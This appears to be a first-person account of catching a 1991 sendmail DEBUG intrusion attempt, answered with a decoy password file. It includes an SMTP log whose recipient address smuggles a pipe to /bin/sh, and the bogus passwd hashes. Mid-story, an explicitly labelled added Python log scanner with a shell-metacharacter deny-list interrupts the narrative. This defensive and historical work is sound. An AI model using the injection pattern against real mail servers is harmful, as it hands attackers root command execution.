I first noticed our volunteer when he made a typical request through an old and deprecated route. He wanted a copy of our password file, presumably for the usual dictionary attack. But he attempted to fetch it using the old sendmail debug hole. (This is not to be confused with new sendmail holes, which are legion.)
The following log, from 15 Jan 1991, showed decidedly unfriendly activity:
19:43:10 smtpd: <--- 220 inet.att.com SMTP
19:43:14 smtpd: -------> debug
19:43:14 smtpd: DEBUG attempt
19:43:14 smtpd: <--- 200 OK
19:43:25 smtpd: -------> mail from:
19:43:25 smtpd: <--- 503 Expecting HELO
19:43:34 smtpd: -------> helo
19:43:34 smtpd: HELO from
19:43:34 smtpd: <--- 250 inet.att.com
19:43:42 smtpd: -------> mail from:
19:43:42 smtpd: <--- 250 OK
19:43:59 smtpd: -------> rcpt to:<"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
19:44:44 smtpd: shell characters: |sed -e '1,/^$/'d | /bin/sh ; exit 0"
19:44:45 smtpd: <--- 250 OK
19:44:48 smtpd: -------> data
19:44:48 smtpd: <--- 354 Start mail input; end with <CRLF>.<CRLF>
19:45:04 smtpd: <--- 250 OK
19:45:04 smtpd: /dev/null sent 48 bytes to upas.security
19:45:08 smtpd: -------> quit
19:45:08 smtpd: <--- 221 inet.att.com Terminating
19:45:08 smtpd: finished.
This is our log of an SMTP session, which is usually carried out between two mailers. In this case, there was a human at the other end typing (and mistyping) commands to our mail daemon. The first thing he tried was the DEBUG command. He must have been surprised when he got the "250 OK" response. (The implementation of this trap required a few lines of code in our mailer. This code has made it to the Unix System V Release 4 mailer.) The key line is the rcpt to: command entered at 19:44:44. The text within the angled brackets of this command is usually the address of a mail recipient. Here it contains a command line. Sendmail used to execute this command line as root when it was in debug mode. In our case, the desired command is mailed to me. The text of the actual mail message (not logged) is piped through
sed -e '1,/^$/'d | /bin/sh ; exit 0"
which strips off the mail headers and executes the rest of the message as root. Here were two of these probes as I logged them, including a time stamp:
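The trap described above does two things a defender wants from a mailer: it records DEBUG attempts, and it flags envelope addresses that contain shell metacharacters instead of executing them. The following is an added example, not code from the paper or from the AT&T mailer, that runs the same two checks over smtpd-style log lines. The log format, the sample session and the helper names (scan_smtp_log, Finding, SHELL_METACHARS) are assumptions modelled on the log shown above; the sample lines are constructed for the example.

```python
import re
from dataclasses import dataclass

# Characters that have no business in a mail address but mean something to /bin/sh.
# This is an assumed list for the example, not the mailer's own.
SHELL_METACHARS = set('|;&`$"\'\\')

# Constructed sample session in the same shape as the smtpd log above:
# "HH:MM:SS smtpd: -------> <client command>" for input typed by the peer,
# "HH:MM:SS smtpd: <--- <reply>" for the daemon's replies.
SAMPLE_LOG = """\
19:43:10 smtpd: <--- 220 inet.att.com SMTP
19:43:14 smtpd: -------> debug
19:43:14 smtpd: <--- 200 OK
19:43:34 smtpd: -------> helo
19:43:34 smtpd: <--- 250 inet.att.com
19:43:42 smtpd: -------> mail from:<alice@example.org>
19:43:42 smtpd: <--- 250 OK
19:43:59 smtpd: -------> rcpt to:<"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
19:44:45 smtpd: <--- 250 OK
19:44:48 smtpd: -------> rcpt to:<bob@example.org>
19:44:48 smtpd: <--- 250 OK
19:45:08 smtpd: -------> quit
"""


@dataclass(frozen=True)
class Finding:
    time: str    # timestamp copied from the log line
    kind: str    # "debug_attempt" or "shell_characters"
    detail: str  # the offending command or address, verbatim


# Only lines carrying client input are interesting; daemon replies are skipped.
CLIENT_RE = re.compile(r'^(\d\d:\d\d:\d\d) smtpd: -------> (.*)$')
# Envelope commands; the bracketed address is optional so a bare "rcpt to:"
# (a mistyped command, as in the session above) still parses.
ENVELOPE_RE = re.compile(r'^(mail from|rcpt to):\s*(?:<(.*)>)?\s*$', re.I)


def scan_smtp_log(text):
    """Return a Finding for every DEBUG attempt and every envelope address
    that contains shell metacharacters, in log order."""
    findings = []
    for line in text.splitlines():
        m = CLIENT_RE.match(line)
        if not m:
            continue
        when, cmd = m.groups()
        verb = cmd.split(None, 1)[0].lower() if cmd.strip() else ""
        if verb == "debug":
            findings.append(Finding(when, "debug_attempt", cmd))
            continue
        env = ENVELOPE_RE.match(cmd)
        if env and env.group(2):
            addr = env.group(2)
            if set(addr) & SHELL_METACHARS:
                findings.append(Finding(when, "shell_characters", addr))
    return findings


if __name__ == "__main__":
    for f in scan_smtp_log(SAMPLE_LOG):
        print(f"{f.time} {f.kind}: {f.detail}")
```

Run against the sample session this reports the debug command at 19:43:14 and the piped address at 19:43:59, and says nothing about the two ordinary addresses. The point of the address check is that it is a deny-list over characters the shell interprets; a mailer that never hands an address to a shell does not need it, which is the real fix the later sendmail versions adopted.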
19:45 mail adrian@embezzle.stanford.edu
He wanted us to mail him a copy of our password file, presumably to run it through a password cracking program. Each of these probes came from a user adrian on embezzle.stanford.edu. They were overtly hostile, and came within half an hour of the announcement of U.S. air raids on Iraq. I idly wondered if Saddam had hired a cracker or two. I happened to have the spare bogus password file in the FTP directory (shown elsewhere), so I mailed that back with a return address of root. I also sent the usual letter to Stanford informing them of the presence of a hacker.
The next morning I heard from Stephen Hansen, an administrator at Stanford. He was up to his ears in hacker problems.
The adrian account had been stolen, and many machines assaulted. He and Tsutomu Shimomura of Los Alamos Labs were developing wiretapping tools to keep up with this guy. The assaults were coming into a terminal server from a phone connection, and they hoped to trace the phone calls at some point.
The following Sunday morning I received a letter from France:
To: root@research.att.com
Subject: intruder
Date: Sun, 20 Jan 91 15:02:53 +0100

I have just closed an account on my machine which has been broken by an intruder coming from embezzle.stanford.edu. He (she) has left a file called passwd. The contents are:
------------
>From root@research.att.com Tue Jan 15 18:49:13 1991
Received: from research.att.com by embezzle.Stanford.EDU Tue, 15 Jan 91 18:49:12 -0800
Message-Id: <9101160249.AA26092@embezzle.Stanford.EDU>
From: root@research.att.com
Date: Tue, 15 Jan 91 21:48 EST
To: adrian@embezzle.stanford.edu
Root: mgajqD9nOAVDw:0:2:0000-Admin(0000):/:
Daemon: *:1:1:0000-Admin(0000):/:
Bin: *:2:2:0000-Admin(0000):/bin:
Sys: *:3:3:0000-Admin(0000):/usr/v9/src:
Adm: *:4:4:0000-Admin(0000):/usr/adm:
Uucp: *:5:5:0000-uucp(0000):/usr/lib/uucp:
Nuucp: *:10:10::/usr/spool/uucppublic:/usr/lib/uucp/uucico
Ftp: anonymous:71:14:file transfer:/:no soap
Ches: j2PPWsiVal..Q:200:1:me:/u/ches:/bin/sh
Dmr: a98tVGlT7GiaM:202:1:Dennis:/u/dmr:/bin/sh
Rtm: 5bHD/k5k2mTTs:203:1:Rob:/u/rtm:/bin/sh
Berferd: deJCw4bQcNT3Y:204:1:Fred:/u/berferd:/bin/sh
Td: PXJ.d9CgZ9DmA:206:1:Tom:/u/td:/bin/sh
Status: R
------------
Please let me know if you heard of him.
Our bogus password file had traveled to France! (A configuration error caused our mailer to identify the password text as RFC 822 header lines, and it carefully adjusted the format accordingly: the first letter of each line was capitalized, and a space was added after the first colon on each line.)